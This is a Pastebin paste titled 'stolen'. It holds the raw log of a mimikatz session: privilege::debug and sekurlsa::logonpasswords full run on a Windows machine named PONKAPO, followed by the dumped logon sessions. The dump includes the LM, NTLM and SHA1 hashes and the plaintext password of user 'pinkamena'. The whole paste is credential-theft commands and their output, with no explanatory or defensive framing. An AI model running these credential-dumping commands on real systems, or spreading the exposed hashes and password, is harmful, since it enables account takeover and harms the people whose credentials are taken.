Advertisement
Guest User

stolen

a guest
Mar 8th, 2017
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.65 KB | None | 0 0
  1. Using 'output.txt' for logfile : OK
  2.  
  3. mimikatz(commandline) # privilege::debug
  4. Privilege '20' OK
  5.  
  6. mimikatz(commandline) # sekurlsa::logonpasswords full
  7.  
  8. Authentication Id : 0 ; 72353 (00000000:00011aa1)
  9. Session : Interactive from 1
  10. User Name : pinkamena
  11. Domain : PONKAPO
  12. Logon Server : PONKAPO
  13. Logon Time : 3/8/2017 8:38:59 PM
  14. SID : S-1-5-21-265181609-3832152440-54318021-1000
  15. msv :
  16. [00000003] Primary
  17. * Username : pinkamena
  18. * Domain : PONKAPO
  19. * LM : c8841564a94d7466aad3b435b51404ee
  20. * NTLM : baefbc4113ae4b3ce0e490a2dbbe7c8b
  21. * SHA1 : 4f0093a2b9ec0f928d0c60e391ea837c8a64273d
  22. tspkg :
  23. * Username : pinkamena
  24. * Domain : PONKAPO
  25. * Password : ponk
  26. wdigest :
  27. * Username : pinkamena
  28. * Domain : PONKAPO
  29. * Password : ponk
  30. kerberos :
  31. * Username : pinkamena
  32. * Domain : PONKAPO
  33. * Password : ponk
  34. ssp :
  35. credman :
  36.  
  37. Authentication Id : 0 ; 997 (00000000:000003e5)
  38. Session : Service from 0
  39. User Name : LOCAL SERVICE
  40. Domain : NT AUTHORITY
  41. Logon Server : (null)
  42. Logon Time : 3/8/2017 8:38:49 PM
  43. SID : S-1-5-19
  44. msv :
  45. tspkg :
  46. wdigest :
  47. * Username : (null)
  48. * Domain : (null)
  49. * Password : (null)
  50. kerberos :
  51. * Username : (null)
  52. * Domain : (null)
  53. * Password : (null)
  54. ssp :
  55. credman :
  56.  
  57. Authentication Id : 0 ; 996 (00000000:000003e4)
  58. Session : Service from 0
  59. User Name : PONKAPO$
  60. Domain : WORKGROUP
  61. Logon Server : (null)
  62. Logon Time : 3/8/2017 8:38:48 PM
  63. SID : S-1-5-20
  64. msv :
  65. tspkg :
  66. wdigest :
  67. * Username : PONKAPO$
  68. * Domain : WORKGROUP
  69. * Password : (null)
  70. kerberos :
  71. * Username : ponkapo$
  72. * Domain : WORKGROUP
  73. * Password : (null)
  74. ssp :
  75. credman :
  76.  
  77. Authentication Id : 0 ; 23470 (00000000:00005bae)
  78. Session : UndefinedLogonType from 0
  79. User Name : (null)
  80. Domain : (null)
  81. Logon Server : (null)
  82. Logon Time : 3/8/2017 8:38:46 PM
  83. SID :
  84. msv :
  85. tspkg :
  86. wdigest :
  87. kerberos :
  88. ssp :
  89. credman :
  90.  
  91. Authentication Id : 0 ; 999 (00000000:000003e7)
  92. Session : UndefinedLogonType from 0
  93. User Name : PONKAPO$
  94. Domain : WORKGROUP
  95. Logon Server : (null)
  96. Logon Time : 3/8/2017 8:38:45 PM
  97. SID : S-1-5-18
  98. msv :
  99. tspkg :
  100. wdigest :
  101. * Username : PONKAPO$
  102. * Domain : WORKGROUP
  103. * Password : (null)
  104. kerberos :
  105. * Username : ponkapo$
  106. * Domain : WORKGROUP
  107. * Password : (null)
  108. ssp :
  109. credman :
  110.  
  111. mimikatz(commandline) # exit
  112. Bye!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement